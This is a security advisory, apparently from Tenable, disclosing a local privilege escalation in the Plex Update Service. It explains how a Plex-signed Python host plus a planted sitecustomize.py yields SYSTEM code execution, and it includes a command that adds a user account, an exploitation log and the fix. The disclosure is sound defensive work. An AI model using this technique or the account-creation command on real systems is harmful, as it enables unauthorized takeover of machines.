Synopsis
The Plex Update Service ("Plex Update Service.exe") contains a flaw that allows a local attacker to execute arbitrary Python code with SYSTEM privileges. The service exposes functionality over an ALPC port that can be invoked by a local, unauthenticated attacker.
The service is defined as such:
[
uuid(631c7d9c-1797-42f9-8e96-367a9ee58887),
version(1.0),
]
interface DefaultIfName
{
void Proc0(
[in][string] wchar_t* arg_1);
long Proc1(
[in][string] wchar_t* arg_1);
long Proc2(
[in][string] wchar_t* arg_1,
[out]long *arg_2);
}
Specifically, Proc2 will execute a given executable if it is signed by Plex, even if it is not a legitimate update file. PlexScriptHost.exe (a Python interpreter) happens to be signed by Plex, and if a file named 'sitecustomize.py' is located in the current working directory, it will be executed when PlexScriptHost is launched. This is expected behavior for Python interpreters, and it can be abused to execute arbitrary code contained in sitecustomize.py.
Proof of Concept
https://github.com/tenable/poc/tree/master/plex/plex_media_server/tra_2020_25Run the PoC and notice that the process is launched as SYSTEM. You will need to inspect the task list.
Launch RpcClient.exe to execute a command of your choosing, or by default execute the Windows Calculator. Below will add a new user.
> RpcClient.exe "net user /add scooby"
Below is a log entry in Plex Update Service.log showing a successful exploitation attempt.
Mar 31, 2020 14:05:05.324 [4796] DEBUG - Install() from UpdateInterface: C:\Users\lowpriv\Documents\RpcClient\RpcClient\Release\PlexScriptHost.exe Mar 31, 2020 14:05:05.324 [4796] DEBUG - CheckBundle() from UpdateInterface: C:\Users\lowpriv\Documents\RpcClient\RpcClient\Release\PlexScriptHost.exe Mar 31, 2020 14:05:05.324 [4796] DEBUG - Checking Certificate of installer: C:\Users\lowpriv\Documents\RpcClient\RpcClient\Release\PlexScriptHost.exe Mar 31, 2020 14:05:05.324 [4796] DEBUG - Certificate integrity verified Mar 31, 2020 14:05:05.324 [4796] DEBUG - HTTP requesting GET https://plex.tv/api/pmscert/profile Mar 31, 2020 14:05:05.839 [4796] DEBUG - HTTP 200 response from GET https://plex.tv/api/pmscert/profile Mar 31, 2020 14:05:05.839 [4796] DEBUG - Certificate identity verified Mar 31, 2020 14:05:05.839 [4796] DEBUG - Create Process Success! Waiting for process to complete. Mar 31, 2020 14:05:05.932 [4796] DEBUG - Installer exit code: 2 - The system cannot find the file specified.
Solution
Upgrade to 1.18.2 or newer. Additionally, Plex Media Server versions 1.19.1.2701 & 1.19.2.2702 (and newer) features additional hardening in the updater infrastructure to protect against future vulnerabilitiesDisclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team